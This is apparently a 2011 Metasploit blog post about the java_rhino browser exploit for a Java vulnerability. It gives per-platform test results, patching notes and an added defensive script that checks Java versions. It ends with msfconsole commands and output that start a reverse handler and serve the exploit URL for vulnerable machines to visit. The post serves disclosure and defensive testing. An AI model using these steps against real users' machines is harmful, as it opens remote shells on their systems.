Exploit for critical Java vulnerability added to Metasploit

Blog Post created by jcran on Nov 30, 2011

@_sinn3r and Juan Vazquez recently released a module which exploits the Java vulnerability detailed here by mihi and here by Brian Krebs. This is a big one. To quote Krebs: "A new exploit that takes advantage of a recently-patched critical security flaw in Java is making the rounds in the criminal underground." To determine if you're running Java, you can use this link and click "Do I have Java?" below the big red 'Free Java Download' button.

We've tested the java_rhino exploit on a number of platforms, and below is a breakout of the results. This vulnerability is particularly pernicious: it is cross-platform, unpatched on some systems, and an easy-to-exploit client-side vulnerability that does little to make the user aware they're being exploited.

Microsoft Windows:

Both Windows XP and Windows 7 were tested for the vulnerability; a session was generated in every browser tested when the system was running a Java version prior to the latest. Note that Chrome did prompt the user to let them know the Java plugin was out of date, though users can still click 'Run this time' and allow the exploit to complete. No other browsers prompted the user.

WinXP SP3 x86 / IE 7 - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP SP3 x86 / Firefox - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP SP3 x86 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP SP3 x86 / Safari 5.1.1 - SESSION CREATED with versions prior to 1.6.0_29-b11
Win7 x64 / IE 8 - SESSION CREATED with versions prior to 1.6.0_29-b11
Win7 x64 / IE 9.0.8 - SESSION CREATED with versions prior to 1.6.0_29-b11

Ubuntu Linux:

Several Linux desktops were tested, one with the Sun Java plugin and another with the IcedTea plugin. The IcedTea Java plugin was determined not to be vulnerable, though since it wasn't tested extensively, it may still be vulnerable.

An attempt was made to update the Ubuntu 10.04 device, and the Java package was downloaded and linked to the system Java; however, the plugin was not installed as part of this process, and thus, even though the device was running the latest (build 1.6.0_29-b11), the 10.04 device remained vulnerable. YOU MUST FOLLOW THESE INSTRUCTIONS TO INSTALL THE JAVA PLUGIN: http://www.oracle.com/technetwork/java/javase/manual-plugin-install-linux-136395.html - However, even after following these instructions, I was unable to get this process to work, and simply disabled Java on the vulnerable device.

Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin. Firefox did not; however, when I went to disable the plugin, I noticed that the 'update' button led me to a page which indicated that Java was out of date and vulnerable. It would be ideal if it prompted the user at runtime.

Ubuntu 10.04 LTS x64 / Firefox (Oracle Java 1.6.0_26) - SESSION CREATED - no package available in the repositories
Ubuntu 10.04 LTS x64 / Chrome (Oracle Java 1.6.0_26) - SESSION CREATED - no package available in the repositories
Ubuntu 11.10 x64 / Chrome (IcedTea 1.6.0_23) - NO SESSION CREATED, null pointer exception in the IcedTea plugin
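
The results above give a defender one concrete threshold: on the Oracle/Sun runtime, sessions were created with anything prior to 1.6.0_29-b11, while the IcedTea plugin was not shown to be vulnerable and the Ubuntu 10.04 notes show a JRE can be current while the browser plugin lags behind. The following script is an added example, not code from the original post or from Metasploit. It parses `java -version` output and classifies the runtime against the 1.6.0_29 threshold taken from these results; the FIXED_VERSION constant, the decision to report OpenJDK/IcedTea and non-1.6 lines as "not judged" rather than "safe", and the sample transcripts (constructed, with made-up JVM build strings) are all assumptions of the example.

```python
"""Added example (not from the original post or Metasploit): classify a Java
runtime from its `java -version` output against the fixed build the post
reports for the Oracle/Sun 1.6 line, 1.6.0_29-b11."""
import re
import subprocess
from typing import Optional, Tuple

# Fixed build from the post's test results ("SESSION CREATED with versions
# prior to 1.6.0_29-b11"). The -bNN suffix is ignored when comparing.
FIXED_VERSION = "1.6.0_29-b11"

# `java -version` prints e.g.  java version "1.6.0_26"  on its first line.
VERSION_RE = re.compile(r'java version "(?P<ver>[^"]+)"')

# Constructed sample transcripts for offline use; JVM build strings are made up.
SAMPLE_OUTPUTS = {
    "ubuntu-10.04-oracle": (
        'java version "1.6.0_26"\n'
        'Java(TM) SE Runtime Environment (build 1.6.0_26-b03)\n'
        'Java HotSpot(TM) 64-Bit Server VM (build 20.1-b02, mixed mode)\n'
    ),
    "after-update": (
        'java version "1.6.0_29"\n'
        'Java(TM) SE Runtime Environment (build 1.6.0_29-b11)\n'
    ),
    "ubuntu-11.10-icedtea": (
        'java version "1.6.0_23"\n'
        'OpenJDK Runtime Environment (IcedTea6 1.11pre) (constructed)\n'
    ),
    "not-java": "bash: java: command not found\n",
}


def parse_java_version(ver: str) -> Tuple[int, int, int, int]:
    """'1.6.0_26' -> (1, 6, 0, 26); '1.6.0_29-b11' -> (1, 6, 0, 29).
    The build suffix is dropped: the update number is what decides."""
    core = ver.split("-", 1)[0]
    main, _, update = core.partition("_")
    parts = [int(p) for p in main.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return (parts[0], parts[1], parts[2], int(update or 0))


def version_from_output(output: str) -> Optional[str]:
    """Pull the quoted version string out of `java -version` output, or None."""
    m = VERSION_RE.search(output)
    return m.group("ver") if m else None


def needs_update(ver: str, fixed: str = FIXED_VERSION) -> Optional[bool]:
    """True if ver is on the fixed build's major.minor line and older than it,
    False if on that line and at or above it, None for a line the post did
    not test (no claim is made either way)."""
    v, f = parse_java_version(ver), parse_java_version(fixed)
    if v[:2] != f[:2]:
        return None
    return v < f


def assess_output(output: str) -> str:
    """Classify one `java -version` transcript as 'predates-fix', 'updated',
    'openjdk-not-judged', 'unknown-line' or 'no-java'. OpenJDK/IcedTea is
    reported separately because the post found it not vulnerable but did not
    test it extensively."""
    ver = version_from_output(output)
    if ver is None:
        return "no-java"
    if "OpenJDK" in output or "IcedTea" in output:
        return "openjdk-not-judged"
    verdict = needs_update(ver)
    if verdict is None:
        return "unknown-line"
    return "predates-fix" if verdict else "updated"


def check_installed_java() -> str:
    """Run the system `java -version` (it writes to stderr) and classify it.
    This judges only the JRE on PATH: as the Ubuntu 10.04 notes show, the
    browser plugin is installed separately and can lag behind the JRE."""
    try:
        proc = subprocess.run(["java", "-version"], capture_output=True, text=True)
    except FileNotFoundError:
        return "no-java"
    return assess_output(proc.stderr + proc.stdout)


if __name__ == "__main__":
    for name, out in SAMPLE_OUTPUTS.items():
        print(f"{name}: {assess_output(out)}")
    print(f"this host: {check_installed_java()}")
```

Run it as-is to see the constructed samples classified, then on a host to classify the JRE on PATH. A "updated" verdict here is necessary but not sufficient: the browser plugin must also be checked, which is the trap the Ubuntu 10.04 device fell into.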

Apple OS X:

Interesting issue here: I was forced to update, restart, then update again to get the updated Sun Java plugin. Apparently one of the updates forced a restart in the middle of the update process, and thus a second update was required to get the latest Java package. To be fair, this system hadn't been updated in recent memory, but it's important to note that multiple updates may be required. This process required approximately one hour to complete.

Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin.

OS X 10.6.6 x64 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11
OS X 10.6.6 x64 / Firefox 6.0.1 - SESSION CREATED with versions prior to 1.6.0_29-b11
OS X 10.6.6 x64 / Safari 5.0.3 - SESSION CREATED with versions prior to 1.6.0_29-b11

Testing for the java_rhino vulnerability:

You can test this exploit in your own environment with the (framework) instructions below. We are currently prepping our weekly update for our commercial customers; it will be available in the Pro / Express / Community products later today.

msf  exploit(handler) > use exploit/multi/browser/java_rhino
msf  exploit(java_rhino) > info
msf  exploit(java_rhino) > set URIPATH xxxx
msf  exploit(java_rhino) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on 10.0.0.11:4444
[*] Using URL: hxxp://0.0.0.0:8080/xxxx
[*]  Local IP: hxxp://10.0.0.11:8080/xxxx
[*] Server started.

Point vulnerable systems at the URL, and wait for your sessions.